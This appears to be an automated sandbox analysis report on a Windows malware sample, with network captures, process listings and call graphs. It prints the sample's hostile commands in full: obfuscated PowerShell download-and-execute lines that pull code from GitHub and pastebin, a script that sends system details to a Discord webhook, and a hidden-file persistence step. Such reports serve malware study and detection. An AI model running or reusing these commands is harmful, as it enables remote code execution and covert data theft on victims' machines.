                                                              2024-10-15 14:01:28 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                              2024-10-15 14:01:28 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                              2024-10-15 14:01:28 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                              2024-10-15 14:01:28 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                              2024-10-15 14:01:28 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                              Session ID: 6 | Source IP: 192.168.2.9 | Source Port: 49943 | Destination IP: 162.159.137.232 | Destination Port: 443 | PID: 7328 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-10-15 14:01:33 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Content-Type: application/json
                                                              Host: discord.com
                                                              Content-Length: 296
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:33 UTC296OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 74 69 6e 61 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4d 57 43 34 59 41 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41
                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** MWC4YAN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FA
                                                              2024-10-15 14:01:34 UTC | 1255 | IN | HTTP/1.1 404 Not Found
                                                              Date: Tue, 15 Oct 2024 14:01:33 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 45
                                                              Connection: close
                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                              x-ratelimit-limit: 5
                                                              x-ratelimit-remaining: 4
                                                              x-ratelimit-reset: 1729000895
                                                              x-ratelimit-reset-after: 1
                                                              via: 1.1 google
                                                              alt-svc: h3=":443"; ma=86400
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ff0O17UB3Ov3KTZmhUISKgZci0UZGNxr8qZ2cdsp%2BKOtY1dKXzn4%2F8MfuzKP4FZAf9cRxS9fA5hleR5PcSqyo83FD6mG%2FNLGtrsuNdDyDiYP6m2NnO7fzKzs2SIV"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              X-Content-Type-Options: nosniff
                                                              Set-Cookie: __cfruid=d9dc4083431ce817dfbc35ac79b778c84967b3e6-1729000893; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                              Set-Cookie: _cfuvid=T8QA7EP1FFG0VuusfKDGu21WWqvSlHvJJ.YAY7ZCz3k-1729000893944-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Server: cloudflare
                                                              CF-RAY: 8d30578259c74761-DFW
                                                              2024-10-15 14:01:34 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                              Session ID: 7 | Source IP: 192.168.2.9 | Source Port: 49984 | Destination IP: 162.159.137.232 | Destination Port: 443 | PID: 7368 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-10-15 14:01:41 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Content-Type: application/json
                                                              Host: discord.com
                                                              Content-Length: 296
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:41 UTC296OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 74 69 6e 61 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4d 57 43 34 59 41 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41
                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** MWC4YAN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FA
                                                              2024-10-15 14:01:42 UTC | 1259 | IN | HTTP/1.1 404 Not Found
                                                              Date: Tue, 15 Oct 2024 14:01:42 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 45
                                                              Connection: close
                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                              x-ratelimit-limit: 5
                                                              x-ratelimit-remaining: 4
                                                              x-ratelimit-reset: 1729000903
                                                              x-ratelimit-reset-after: 1
                                                              via: 1.1 google
                                                              alt-svc: h3=":443"; ma=86400
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WJRR4H3K2KLLgXbDWi7%2BRVDgprYviDKr3%2BaAafST2985oEVwmhp91vSVx1TAAfQpa8oI7eXDu46chZ%2FmIKZI1DmY%2FkZnf027A7xgT4J0510P%2FMSwyWeaRV1UEpF"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              X-Content-Type-Options: nosniff
                                                              Set-Cookie: __cfruid=fbd1557a38fcd621c012b0decde5f8af2ef4fff2-1729000902; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                              Set-Cookie: _cfuvid=Ezu6upK7b7Q.YbiuCSJWjKSjGNCEhRlEZ00le.X7ekw-1729000902110-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Server: cloudflare
                                                              CF-RAY: 8d3057b57f8f475c-DFW
                                                              2024-10-15 14:01:42 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}



                                                              Target ID:0
                                                              Start time:10:00:55
                                                              Start date:15/10/2024
                                                              Path:C:\Users\user\Desktop\OSLdZanXNc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\OSLdZanXNc.exe"
                                                              Imagebase:0x7ff68ef30000
                                                              File size:45'568 bytes
                                                              MD5 hash:98FF253F6F854DF7B7F6794A2761DBD1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:10:00:55
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:10:00:55
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:10:00:58
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:5
                                                              Start time:10:00:58
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:7
                                                              Start time:10:01:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\forfiles.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                              Imagebase:0x7ff7af110000
                                                              File size:52'224 bytes
                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:8
                                                              Start time:10:01:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:9
                                                              Start time:10:01:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\attrib.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                              Imagebase:0x7ff780d50000
                                                              File size:23'040 bytes
                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:10:01:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:11
                                                              Start time:10:01:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:12
                                                              Start time:10:01:24
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\forfiles.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                              Imagebase:0x7ff7af110000
                                                              File size:52'224 bytes
                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:13
                                                              Start time:10:01:24
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:14
                                                              Start time:10:01:24
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:15
                                                              Start time:10:01:24
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false


                                                                Execution Graph

                                                                Execution Coverage:4.7%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:46.3%
                                                                Total number of Nodes:242
                                                                Total number of Limit Nodes:4
                                                                execution_graph (rendered graph; node and edge text not reproduced). The node labels on the executed path name the following API calls: _seh_filter_exe, memmove, memset, malloc, realloc, free, strrchr, strncmp, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, InitializeSListHead, IsProcessorFeaturePresent, WinExec, CreateFileA, GetFileSize, ReadFile, GetLastError, CloseHandle, CopyFileA, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, GetModuleHandleW, GetCurrentProcess, TerminateProcess, _exit, _cexit, __acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vsprintf, __scrt_acquire_startup_lock, __scrt_release_startup_lock, _get_initial_narrow_environment, __p___argv, __p___argc, _register_thread_local_exe_atexit_callback, _initialize_onexit_table and _RTC_Initialize. The entry routine 7ff68ef31d04 reaches 7ff68ef31530, which in turn calls malloc, WinExec, free, strrchr, CreateFileA, GetFileSize, ReadFile, CopyFileA and the file-mapping helper 7ff68ef310e0.

                                                                Callgraph

                                                                • Executed
                                                                • Not Executed
                                                                • Opacity -> Relevance
                                                                • Disassembly available
                                                                callgraph (rendered graph of Function_00007FF68EF3xxxx nodes and their call edges; not reproduced). Function_00007FF68EF31D04 is the entry point and calls Function_00007FF68EF31530, which calls Function_00007FF68EF31450, Function_00007FF68EF32A60, Function_00007FF68EF32960, Function_00007FF68EF314B0, Function_00007FF68EF329C0, Function_00007FF68EF310E0, Function_00007FF68EF313F0, Function_00007FF68EF31C00 and Function_00007FF68EF32A10.

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph for 7ff68ef31530 (rendered basic-block graph; not reproduced). The blocks call malloc, WinExec, free, strrchr, CreateFileA, GetLastError, GetFileSize, ReadFile, CloseHandle, CopyFileA, the printf helper 7ff68ef313f0, the sprintf helper 7ff68ef31450, the validation helper 7ff68ef314b0, the buffer helpers 7ff68ef32960, 7ff68ef329c0, 7ff68ef32a60 and 7ff68ef32a10, the file-mapping helper 7ff68ef310e0 and the exit path 7ff68ef31c00.
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: printf$File$ErrorLastmalloc$Createfree$CloseCopyExecHandleReadSize__acrt_iob_func__stdio_common_vfprintfmemsetstrrchr
                                                                • String ID: [ DONE ] $%s%s$.\DllPP64Stub.dll$.\H_PP64Stub.exe$.\unpacker.exe$CopyFileA$CreateFileA$DllPP64Stub.dll$H_PP64Stub.exe$ReadFile$[!] Compression Failed With Error : %d $[!] "%s" [ FAILED ] %d $[!] Failed To Create A New Section $[#] Output : $[#] Usage : %s <Input x64 exe> <*Output*>$[+] Compressed Ratio : %d%% $[+] Final Pe Size : %d $[+] Section .ATOM is Created Containing The Input Packed Pe $[i] "%s" Is Invalid Input, Defaulting To Outputting Exe File ... $[i] 32-PE Input Detected ... [ NOT-SUPPORTED ]$[i] 64-PE Input Detected ... [ SUPPORTED ]$[i] Generating Dll Output ... $[i] Generating Exe Output ... $[i] Generating No Console Exe Output ... $[i] Packing ... $[i] Reading " %s " ... $[i] Reading The Loader "%s" ...$hell.e$hoo -zlqgrzvwboh k -dujv {lha(lzu udz.jlwkxexvhufrqwhqw.frp/Qhwk3Q/qd9rz3495udbjzl4jbukxdzhudzhud/uhiv/khdgv/pdlq/fu_dvp_fubswhu.waw -xvhedvlfsduvlqj)}$powers$stublocation\$unpacker.exe
                                                                • API String ID: 2980077734-226719752
